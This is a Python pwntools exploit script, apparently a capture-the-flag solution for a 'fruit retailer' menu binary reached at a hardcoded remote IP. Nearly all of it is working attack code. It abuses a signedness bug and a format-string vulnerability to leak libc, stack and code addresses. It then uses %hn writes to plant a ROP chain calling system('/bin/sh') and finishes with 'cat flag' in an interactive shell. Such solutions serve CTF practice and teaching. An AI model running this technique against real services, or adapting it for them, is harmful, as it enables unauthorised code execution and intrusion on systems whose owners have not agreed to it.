# -----------------------------------
# | n00b-author: h4niz |
# -----------------------------------
#!/usr/bin/env python
from pwn import *
import struct
# io = process("./fruitretailer_50E291AAFA5777625B18530F5C6F7A92", env={'_LD_PRELOAD': 'libc6_2.27-3ubuntu1_amd64.so'})
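# Target selection. The original EC2 hostname is kept for reference only;
# the bare IP below is the one actually used. (The script previously
# assigned `host` twice, which silently masked which target was live.)
# host = "ec2-54-255-145-181.ap-southeast-1.compute.amazonaws.com"
host = "125.235.240.167"
port = 5000
io = remote(host, port)
# Reset pwntools globals after connecting, then pin the target byte order
# (struct.pack("<Q") below also assumes little-endian).
context.clear()
# context.log_level = 'debug'
context.endian = 'little'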
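def buy(fr, leak, fmt):
    """Drive menu option 1 (buy) and submit `fmt` as the delivery address.

    fr   -- 'apple' (menu 1) or 'banana' (menu 2). Any other value raises
            ValueError up front; the original fell through and left the
            remote blocked waiting for the fruit choice.
    leak -- sent verbatim as the quantity. Every caller passes 4294967295
            (0xFFFFFFFF, i.e. -1 as a signed 32-bit int); presumably the
            signedness bug that lets the purchase through -- confirm
            against the binary.
    fmt  -- the address string. This is the attacker-controlled format
            string that create_invoice() later gets printed.
    """
    choice = {'apple': "1", 'banana': "2"}
    if fr not in choice:
        raise ValueError("unknown fruit %r (expected 'apple' or 'banana')" % (fr,))
    io.recvuntil("Your choice:")
    io.sendline("1")
    io.recvuntil("banana (2)?:")
    io.sendline(choice[fr])
    io.recvuntil("Enter quantity:")
    io.sendline(str(leak))
    io.recvuntil("(Y/N)")
    io.sendline('y')
    # No prompt is awaited before the address; the caller's next
    # recvuntil("Your choice:") resynchronises the stream.
    io.sendline(str(fmt))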
def create_invoice():
    """Pick menu option 2 (print the invoice).

    This is the step that renders the address submitted in buy(), so it is
    where the format-string leak and the %hn writes actually happen.
    """
    io.sendlineafter("Your choice:", "2")
def change_label(idx):
    """Menu option 3: rename item `idx` to a fixed 10-byte filler.

    The label text itself is never used; the script calls this once per
    purchase with a fresh index (1, then 2..19, then 20) between buy() and
    create_invoice(). Why that step is required is not evident from this
    script -- check the binary before dropping it.
    """
    filler = "a" * 10
    io.sendlineafter("Your choice:", "3")
    io.sendlineafter("change:", str(idx))
    io.sendlineafter("new label:", filler)
def change_comment(idx, fmt):
    """Menu option 4: replace the address field of item `idx` with `fmt`.

    An alternative way to plant a format string without a new purchase.
    Not used by the exploit flow below; kept as a helper.
    """
    steps = (("Your choice:", "4"), ("change:", str(idx)), ("address:", str(fmt)))
    for prompt, answer in steps:
        io.sendlineafter(prompt, answer)
def iquit():
    """Menu option 5: quit the program.

    Presumably the return path that pops the frame the ROP chain was
    written into -- confirm against the binary.
    """
    io.sendlineafter("Your choice:", "5")
#Buy banana, quantity=-1, address= "A"*0x3f + "X" + fmt
# gdb.attach(io)
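data = dict()
offset = dict()
# libc (libc6_2.27-3ubuntu1_amd64, see the commented process() line above)
# and binary-relative offsets. Values in trailing comments are from an
# earlier target build and are kept for reference only.
offset['system'] = 0x04f440  # 0x46590
offset['__libc_start_main'] = 0x21e50
offset['ebp'] = 0x1e030  # not used below
offset['poprdi'] = 0x0000000000001533  # 0x22b9a  (binary-relative: pop rdi; ret)
offset['poprsi'] = 0x24885  # not used below
offset['sh'] = 0x1b3e9a  # 0x180543  ("/bin/sh" in libc)


def _parse_leaks(blob):
    """Split the '<p13>.<p8>;<p9>+' tail of the invoice line into three ints.

    `blob` is what the server prints after the "B." marker: three %p values
    joined by '.', ';' and terminated by '+' (the layout of `fmt` below).
    Returns (libc_start_main_ret, stack_ptr, code_ptr). Raises ValueError
    carrying the raw text when a field is not a hex pointer (e.g. "(nil)"
    for a NULL slot) instead of the bare int() traceback.
    """
    body = blob.split("+", 1)[0]
    try:
        first, rest = body.split(".", 1)
        second, third = rest.split(";", 1)
        return int(first, 16), int(second, 16), int(third, 16)
    except ValueError:
        raise ValueError("unexpected leak format: %r" % (blob,))


# Leak three stack slots through the address field: %13$p is the return
# address into __libc_start_main, %8$p a stack pointer, %9$p a pointer into
# the binary. The 0x40 'A' prefix precedes the markers; whether the binary
# prints it or consumes it separately is not visible here.
fmt = "A"*0x40 + "B.%13$p.%8$p;%9$p+"
buy(fr='banana', fmt=fmt, leak=4294967295)
change_label(1)
create_invoice()
io.recvuntil("B.")
libc_start_main_ret, stack_leak, code_leak = _parse_leaks(io.recvuntil("+"))
# 0x021b97 is the offset of that return address inside libc. The earlier
# comment (offset['__libc_start_main'] - 245) does not produce this value;
# the literal is what was used against the target.
data['libcbase'] = libc_start_main_ret - 0x021b97
print("[+] libcbase: %#x" % data['libcbase'])
print("[+] __libc_start_main_ret: %#x" % libc_start_main_ret)
data['system'] = data['libcbase'] + offset['system']
print("[+] system: %#x" % data['system'])
# Frame pointer is 0x20 below the leaked %8$p value.
data['ebp'] = stack_leak - 0x20
print("[+] ebp: %#x" % data['ebp'])
print("[+] code leak: %#x" % code_leak)
data['codebase'] = code_leak - 0x14b0
data['poprdi'] = data['codebase'] + offset['poprdi']
data['sh'] = data['libcbase'] + offset['sh']
print("[&] poprdi: %#x" % data['poprdi'])
# ROP chain, in the order it is laid out on the stack by the loop below:
# pop rdi; ret -> "/bin/sh" -> system.
write = dict()
write[1] = struct.pack("<Q", data['poprdi'])
write[2] = struct.pack("<Q", data['sh'])
write[3] = struct.pack("<Q", data['system'])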
#Take control
# Low 16 bits of the leaked frame pointer. Every write below goes through
# %hn, so only the bottom half-word of the pointer at %6$ is ever changed;
# this assumes that slot already holds an address in the same 64 KiB window
# as the target -- TODO confirm. NOTE(review): ebp is at most 0xffff, so if
# ebp + 0x10 + j crosses 0x10000 the half-word count wraps and the write
# lands low.
ebp = u16(struct.pack("<Q", data['ebp'])[:2])
# First ROP slot sits 0x10 above the leaked frame pointer.
control = ebp + 0x10
print "Control: %#x" %control
j = 0    # byte offset into the chain (0,2,4, 8,10,12, 16,18,20)
pos = 2  # end of the current 2-byte chunk within write[v]
v = 1    # which 8-byte entry of `write` is being written
# Nine iterations: three half-words for each of the three chain entries.
# Each iteration consumes two item labels (i and i+1), matching 2..19.
# The top half-word of every entry is skipped (j jumps 4 -> 8), so the
# stack slots are assumed to already hold zeros there -- TODO confirm.
for i in xrange(2,19, 2):
    # Change address: write (control+j) into the slot that %8$ reads,
    # through the pointer held at %6$.
    p = "A"*0x40
    p += "%" + str( (control)+j) + "c"
    p += "%6$hn"
    buy(fr='banana', fmt = p, leak=4294967295)
    change_label(i)
    create_invoice()
    #====================================
    # Overwrite: %8$ now points at control+j; write the next half-word of
    # write[v] there. NOTE(review): if the 0x40 'A' prefix is part of the
    # printed output the %hn count is 0x40 + N, not N -- verify which
    # before reusing this against another layout.
    p = "A"*0x40
    p += "%" + str(u16(write[v][pos-2:pos])) + "c"
    p += "%8$hn"
    buy(fr='banana', fmt = p, leak=4294967295)
    change_label(i+1)
    create_invoice()
    # print "%#x" %(u64(write[v]))
    # print "%#x" %(u16(write[v][pos-2:pos]))
    # print "%#x" %j
    # print "%#x" %(control+j)
    # Advance to the next half-word; after the third one skip to the
    # next 8-byte slot.
    if j % 8 == 4:
        j = j + 4
    else:
        j = j + 2
    pos = pos + 2
    if pos == 8:
        v = v + 1
        pos = 2
#Reset ebp
# One last %6$hn write, this time with ebp+8 as the count, so the slot read
# through %6$ points just above the saved frame pointer. Label 20 is the
# first unused item after the 2..19 loop. What consumes that pointer is not
# visible in this script -- presumably the frame iquit() returns through.
reset = "".join(["A" * 0x40, "%", str(ebp + 8), "c", "%6$hn"])
buy(fr='banana', fmt=reset, leak=4294967295)
change_label(20)
create_invoice()
#====================================
# Quitting is presumably what hands control to the chain written above;
# once system("/bin/sh") is up, read the flag and hand the session over.
iquit()
io.sendline("cat flag")
io.interactive()